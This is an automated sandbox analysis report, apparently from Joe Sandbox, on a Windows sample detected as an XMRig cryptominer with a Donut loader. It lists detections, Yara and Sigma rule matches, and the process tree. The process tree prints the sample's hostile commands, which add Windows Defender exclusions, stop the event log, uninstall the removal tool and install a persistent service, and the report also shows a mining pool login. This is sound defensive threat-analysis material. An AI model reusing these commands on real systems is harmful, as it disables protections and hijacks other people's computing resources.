Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1458484
MD5:	b99383ade7723a2376ac12d1ff516aa6
SHA1:	5298425d67725856a9bd85104b5b585b306f2b53
SHA256:	13a78b0cac6ce349e4dbfeb770d7c77d598b0ed1c688e7cf915d2f931cd58bf7
Tags:	exe
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop EventLog

Snort IDS alert for network traffic

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Detected Stratum mining protocol

Found direct / indirect Syscall (likely to bypass EDR)

Found strings related to Crypto-Mining

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Sample is not signed and drops a device driver

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 4340 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B99383ADE7723A2376AC12D1FF516AA6)

conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

notepad.exe (PID: 1280 cmdline: notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)

powershell.exe (PID: 3196 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6528 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 6272 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 2760 cmdline: C:\Windows\system32\sc.exe delete "MXOLIHZI" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4996 cmdline: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3768 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2580 cmdline: C:\Windows\system32\sc.exe start "MXOLIHZI" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nlkuzmdacjrb.exe (PID: 5608 cmdline: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe MD5: B99383ADE7723A2376AC12D1FF516AA6)

notepad.exe (PID: 1208 cmdline: notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)

powershell.exe (PID: 4904 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6804 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 3260 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 2120 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x28e7d1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x28e791:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x28e7d1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x28e791:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37eb98:$a1: mining.set_target 0x370e20:$a2: XMRIG_HOSTNAME 0x373748:$a3: Usage: xmrig [OPTIONS] 0x370df8:$a4: XMRIG_VERSION
Process Memory Space: conhost.exe PID: 2120	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: conhost.exe PID: 2120	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x58b52:$a1: mining.set_target 0x552fb:$a2: XMRIG_HOSTNAME 0x56073:$a3: Usage: xmrig [OPTIONS] 0x552dc:$a4: XMRIG_VERSION
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
26.2.conhost.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
26.2.conhost.exe.140000000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37ef98:$a1: mining.set_target 0x371220:$a2: XMRIG_HOSTNAME 0x373b48:$a3: Usage: xmrig [OPTIONS] 0x3711f8:$a4: XMRIG_VERSION
26.2.conhost.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
26.2.conhost.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c9748:$s1: %s/%s (Windows NT %lu.%lu 0x3cd180:$s3: \\.\WinRing0_ 0x376148:$s4: pool_wallet 0x3705f0:$s5: cryptonight 0x370600:$s5: cryptonight 0x370610:$s5: cryptonight 0x370620:$s5: cryptonight 0x370638:$s5: cryptonight 0x370648:$s5: cryptonight 0x370658:$s5: cryptonight 0x370670:$s5: cryptonight 0x370680:$s5: cryptonight 0x370698:$s5: cryptonight 0x3706b0:$s5: cryptonight 0x3706c0:$s5: cryptonight 0x3706d0:$s5: cryptonight 0x3706e0:$s5: cryptonight 0x3706f8:$s5: cryptonight 0x370710:$s5: cryptonight 0x370720:$s5: cryptonight 0x370730:$s5: cryptonight

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3196, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto", ProcessId: 4996, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3196, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3768, ProcessName: sc.exe

Snort Signatures

ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.6 - Destination IP: 1.1.1.1

Timestamp:	06/17/24-18:15:13.266118
SID:	2036289
Source Port:	62460
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 2120, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.6:49717 -> 45.76.89.70:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4agh8zkebtmi6nakn8kytbecuawowbajkj6vedxzmsipjtkywtf1hhadafjn39jtrsxipbhsszqnt2u1jycpsaedmhft2qq","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.

Found strings related to Crypto-Mining

Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe	String found in binary or memory: cryptonight-monerov7
Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr
Source:	Binary string: ad.pdb" source: file.exe, nlkuzmdacjrb.exe.0.dr
Source:	Binary string: ad.pdb source: file.exe, nlkuzmdacjrb.exe.0.dr

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.6:62460 -> 1.1.1.1:53

Source: global traffic

TCP traffic: 192.168.2.6:49717 -> 45.76.89.70:3333

Source: Joe Sandbox View

IP Address: 45.76.89.70 45.76.89.70

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: pool.hashvault.pro

Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://172.94.1q
Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

System Summary

Malicious sample detected (through community Yara rule)

Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 2120, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Source: C:\Windows\System32\conhost.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF72877D4A0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	0_2_00007FF72877D4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001BB80981394 NtEnumerateValueKey,	0_2_000001BB80981394
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B54D4A0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	18_2_00007FF63B54D4A0
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00000122A4921394 NtQuerySecurityObject,	18_2_00000122A4921394
Source: C:\Windows\System32\conhost.exe	Code function: 23_2_0000000140001394 NtDeleteWnfStateName,	23_2_0000000140001394

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

File created: C:\Windows\TEMP\gtebvdararzg.sys

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_1ksoiwsx.q32.ps1

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7287711B0	0_2_00007FF7287711B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728771DEC	0_2_00007FF728771DEC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728774167	0_2_00007FF728774167
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728787580	0_2_00007FF728787580
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728781EF0	0_2_00007FF728781EF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728785F00	0_2_00007FF728785F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7287747BA	0_2_00007FF7287747BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7287713F3	0_2_00007FF7287713F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7287713FA	0_2_00007FF7287713FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728771401	0_2_00007FF728771401
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728771408	0_2_00007FF728771408
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF72877FC10	0_2_00007FF72877FC10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728778740	0_2_00007FF728778740
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF728771350	0_2_00007FF728771350
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF72878AB90	0_2_00007FF72878AB90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7287884A0	0_2_00007FF7287884A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7287738E1	0_2_00007FF7287738E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001BB80983B50	0_2_000001BB80983B50
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B5584A0	18_2_00007FF63B5584A0
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B5438E1	18_2_00007FF63B5438E1
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B55AB90	18_2_00007FF63B55AB90
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B548740	18_2_00007FF63B548740
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B541350	18_2_00007FF63B541350
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B5413FA	18_2_00007FF63B5413FA
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B541401	18_2_00007FF63B541401
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B541408	18_2_00007FF63B541408
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B54FC10	18_2_00007FF63B54FC10
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B5413F3	18_2_00007FF63B5413F3
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B5447BA	18_2_00007FF63B5447BA
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B555F00	18_2_00007FF63B555F00
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B551EF0	18_2_00007FF63B551EF0
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B5411B0	18_2_00007FF63B5411B0
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B557580	18_2_00007FF63B557580
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B544167	18_2_00007FF63B544167
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B541DEC	18_2_00007FF63B541DEC
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00000122A4923B50	18_2_00000122A4923B50
Source: C:\Windows\System32\conhost.exe	Code function: 23_2_0000000140003150	23_2_0000000140003150
Source: C:\Windows\System32\conhost.exe	Code function: 23_2_00000001400026E0	23_2_00000001400026E0

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\gtebvdararzg.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: String function: 00007FF63B55A3D0 appears 69 times
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: String function: 00000122A4921394 appears 33 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF72878A3D0 appears 69 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 000001BB80981394 appears 33 times

Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
